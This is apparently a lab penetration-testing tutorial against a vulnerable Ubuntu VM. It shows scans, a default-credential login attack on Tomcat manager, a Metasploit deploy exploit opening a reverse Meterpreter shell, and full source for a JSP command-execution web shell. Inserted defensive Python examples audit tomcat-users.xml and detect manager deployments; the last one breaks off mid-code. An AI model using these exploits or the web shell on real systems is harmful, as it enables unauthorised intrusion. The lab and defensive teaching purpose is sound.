
Exploitation Ubuntu – Windows Services

June 27, 2013 by Fotis Liatsis

This tutorial describes the basic principles of gathering information in order to exploit vulnerable machines, here an Ubuntu Server and a Windows XP system. Both systems have vulnerable services installed, such as Apache Tomcat (Java) and a Samba file server, as well as vulnerable databases: PostgreSQL on the Ubuntu machine and MySQL on the Windows machine respectively.

This tutorial walks through the following steps against both machines:

  • Gathering information
  • Identify open network services
  • Exploit vulnerable services

(Note: For the purposes of this tutorial, BackBox (based on Ubuntu) is used as the host OS, together with the latest installation package of Oracle VM VirtualBox, and Ubuntu 9.04 / Windows XP SP2 as the guest OSs.)

Setting Up VM – Manual ifconfig

Before starting our penetration testing on the VMs, we'll set up and configure a couple of things in the VM system. After creating both guest machines (Ubuntu and Windows), click the "Settings" button and navigate to the "Network" tab. For the network interface choose "Host-only Adapter"; the vboxnet0 option will be set automatically.

Next we’ll set up the eth0 interface for Ubuntu OS. On the terminal type:

[c]
ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up
[/c]

If you would like the network information to be assigned statically, without having to enter it manually each time, you can edit the /etc/network/interfaces file for the appropriate Ethernet device.

[c]
# The host-only network interface
auto eth0
iface eth0 inet static
address 192.168.56.102
netmask 255.255.255.0
network 192.168.56.0
broadcast 192.168.56.255
[/c]

(Note: Be sure to restart the network service after modifying this file (/etc/init.d/networking restart).)

Next you will set up the Windows network interface. Open a command prompt (type cmd and click "OK").

Then navigate to the Network Connections panel.

In the connection's properties panel choose "Internet Protocol (TCP/IP)" and click "Properties". On the "General" tab choose "Use the following IP address" and enter the appropriate network information.

Next, at the command prompt, run the following command to verify the adapter settings:

[c]
ipconfig /all
[/c]

Verifying connectivity

We will ping the machines to verify connectivity. If everything is configured correctly, you should see output along the lines of the following:

Ubuntu Machine:

[c]
root@wizard32:~# ping 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms
64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms
^C
--- 192.168.56.102 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms
[/c]

And

[c]
root@ubuntu:~$ ping 192.168.56.1
PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.
64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms
64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms
^C
--- 192.168.56.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms
[/c]

Windows Machine:

[c]
root@wizard32:~# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms
64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms
^C
--- 192.168.56.103 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms
[/c]

And

[c]
C:\Documents and Settings\windowsxp>ping 192.168.56.1
Pinging 192.168.56.1 with 32 bytes of data:
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.56.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
[/c]

Gathering Information – Ubuntu Machine

We'll begin with some basic scans against our Ubuntu VM at 192.168.56.102. First, a simple scan to determine which TCP ports are open on the target, using the -p- option (all 65535 ports):

[c]
root@wizard32:~# nmap -p- 192.168.56.102
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
[/c]

Looking at the scan results, we can see that many ports are open. So let's use another tool, nikto, to learn a little more about the web service on port 8180:

[c]
root@wizard32:~# nikto -h 192.168.56.102 -p 8180
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 8180
+ Start Time: 2013-06-19 14:04:00
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /: Appears to be a default Apache Tomcat install.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-3092: /admin/: This might be interesting…
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.
+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.
+ /admin/account.html: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2013-06-19 14:05:24 (84 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[/c]

Exploit Vulnerable Backdoors

Reviewing the nikto output closely, we can see that port 8180/tcp runs an Apache Tomcat server. We can identify the Tomcat version using Metasploit:

[c]
msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options
Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_administration) > run
[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, Apache Tomcat/5.5 is in use. So, once more using Metasploit, we'll try to log in to the Tomcat manager application with a list of default username/password pairs:

[c]
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > run
[*] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - Trying username:'' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - Trying username:'admin' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - Trying username:'manager' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - Trying username:'role1' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - Trying username:'root' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - Trying username:'tomcat' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - Trying username:'both' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - Trying username:'j2deployer' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - Trying username:'ovwebusr' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - Trying username:'cxsdk' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - Trying username:'ADMIN' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - Trying username:'xampp' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - Trying username:'admin' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - Trying username:'manager' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - Trying username:'role1' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - Trying username:'root' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [17/63] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - Trying username:'both' with password:'both'
[-] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - Trying username:'xampp' with password:'xampp'
[-] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - Trying username:'' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - Trying username:'' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - Trying username:'' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - Trying username:'' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - Trying username:'' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - Trying username:'' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - Trying username:'admin' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - Trying username:'admin' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - Trying username:'admin' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - Trying username:'admin' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - Trying username:'admin' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - Trying username:'manager' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - Trying username:'manager' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - Trying username:'manager' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - Trying username:'manager' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - Trying username:'manager' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - Trying username:'role1' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - Trying username:'role1' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - Trying username:'role1' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - Trying username:'role1' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - Trying username:'role1' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - Trying username:'root' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - Trying username:'root' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - Trying username:'root' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - Trying username:'root' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - Trying username:'root' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - Trying username:'both' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - Trying username:'both' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - Trying username:'both' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - Trying username:'both' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - Trying username:'both' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - Trying username:'both' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

Reviewing the result, we can see that the Tomcat manager accepts "tomcat" as both username and password. Using these credentials, let's exploit it:

[c]
msf> use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Attempting to automatically select a target…
[*] Automatically selected target "Linux x86"
[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war …
[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp…
[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT …
[*] Sending stage (30246 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid
Server username: tomcat55
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
cd /etc
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
::
:
[/c]
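The login scan succeeded only because the credentials shipped in the sample tomcat-users.xml were never changed. As an added example (not from the article or the Tomcat project), the Python script below audits a tomcat-users.xml for the default pairs the scan tried, for passwords equal to the username, and for accounts holding several privileged roles. Both XML documents are constructed for the example: WEAK_USERS mirrors the situation on the Ubuntu guest (tomcat/tomcat reaches the manager app), HARDENED_USERS shows one acceptable configuration; the default-credential list and the minimum password length are assumptions.

```python
"""Audit a Tomcat tomcat-users.xml for default credentials and over-privileged
accounts (added example; not from the article or the Tomcat project)."""
import xml.etree.ElementTree as ET

# Constructed: the pattern of a sample tomcat-users.xml that was never edited.
WEAK_USERS = """\
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
</tomcat-users>
"""

# Constructed: one dedicated deployment account, one privileged role, long password.
HARDENED_USERS = """\
<tomcat-users>
  <role rolename="manager"/>
  <user username="deploy-svc" password="Xq7!vL2#pR9wTz4mKd" roles="manager"/>
</tomcat-users>
"""

# Username/password pairs commonly found in sample configs and in the login
# scan shown in the article (assumed list for this example).
DEFAULT_CREDENTIALS = {
    ("tomcat", "tomcat"), ("admin", "admin"), ("manager", "manager"),
    ("role1", "role1"), ("both", "tomcat"), ("role1", "tomcat"),
    ("admin", ""), ("tomcat", ""),
}
# Roles that allow deploying applications or administering the container.
PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script", "admin-gui"}
MIN_PASSWORD_LEN = 12  # policy value assumed for this example


def audit_tomcat_users(xml_text):
    """Return a list of human-readable findings; an empty list means the file passes."""
    findings = []
    root = ET.fromstring(xml_text)
    for user in root.iter("user"):
        name = user.get("username", "")
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        if (name, password) in DEFAULT_CREDENTIALS:
            findings.append(f"{name}: default credential pair")
        elif password == name:
            findings.append(f"{name}: password equals username")
        if len(password) < MIN_PASSWORD_LEN:
            findings.append(f"{name}: password shorter than {MIN_PASSWORD_LEN} characters")
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if len(privileged) > 1:
            findings.append(f"{name}: holds several privileged roles {privileged}")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_USERS), ("hardened", HARDENED_USERS)):
        print(label, audit_tomcat_users(doc) or ["no findings"])
```

Credentials are only half of the fix: the manager context can additionally be restricted to administrative source addresses with Tomcat's RemoteAddrValve, and a server that does not need remote deployment at all is best served by removing the manager and admin web applications entirely.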

Vulnerable Web Service

Open a browser and enter the IP of the VM together with the port of the Apache Tomcat server (IP:Port).

Next click "Tomcat Manager" in the Administration panel on the left and enter "tomcat" as both username and password.

Next we'll create and upload a .war file containing a JSP page that executes whatever command it is given. Create a file named cmd_shell.jsp with the following content:

[js]
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML>
<TITLE>JSP Shell</TITLE>
<BODY>
Note: Against Windows you may need to prefix your command with cmd.exe /c
</br></br>
JSP Command:
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</PRE>
</BODY>
</HTML>
[/js]

Then compress the file using the jar command as follows:

[c]
jar -cvf cmd.war cmd_shell.jsp
[/c]

(Note: .war is the file type accepted for deployment by the Apache Tomcat Manager.)

Next, browse to the .war file and deploy it. As we can see, the /cmd path was added.

Click this path, then complete the URL in the address bar by appending cmd_shell.jsp:

At this point we can type any Unix/Windows command, as if we were at a command prompt.
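Deployment through the manager leaves a recognisable trail in Tomcat's access log: deploy, undeploy or html/upload requests authenticated as the manager user, followed by requests into the freshly created context. The following Python detection is an added example, not code from the article. The log lines are constructed in the AccessLogValve "common" format to mirror the Metasploit deploy/undeploy sequence and the manual cmd.war deployment shown above; the client addresses, timestamps, response sizes and the failed-login threshold are assumptions.

```python
"""Detect manager-based deployments and web-shell use in Tomcat access-log lines
(added example; not from the article)."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log in Tomcat's "common" AccessLogValve pattern:
# %h %l %u %t "%r" %s %b
ACCESS_LOG = """\
192.168.56.1 - - [18/Jun/2013:15:29:10 +0300] "GET /manager/html HTTP/1.1" 401 -
192.168.56.1 - - [18/Jun/2013:15:29:11 +0300] "GET /manager/html HTTP/1.1" 401 -
192.168.56.1 - tomcat [18/Jun/2013:15:29:12 +0300] "GET /manager/html HTTP/1.1" 200 9342
192.168.56.1 - tomcat [18/Jun/2013:15:30:52 +0300] "PUT /manager/deploy?path=/DqyPmto6a9UzwBp3l1AUIFIT HTTP/1.1" 200 63
192.168.56.1 - - [18/Jun/2013:15:30:53 +0300] "GET /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp HTTP/1.1" 200 0
192.168.56.1 - tomcat [18/Jun/2013:15:30:54 +0300] "GET /manager/undeploy?path=/DqyPmto6a9UzwBp3l1AUIFIT HTTP/1.1" 200 60
192.168.56.20 - tomcat [19/Jun/2013:09:02:00 +0300] "POST /manager/html/upload HTTP/1.1" 200 8811
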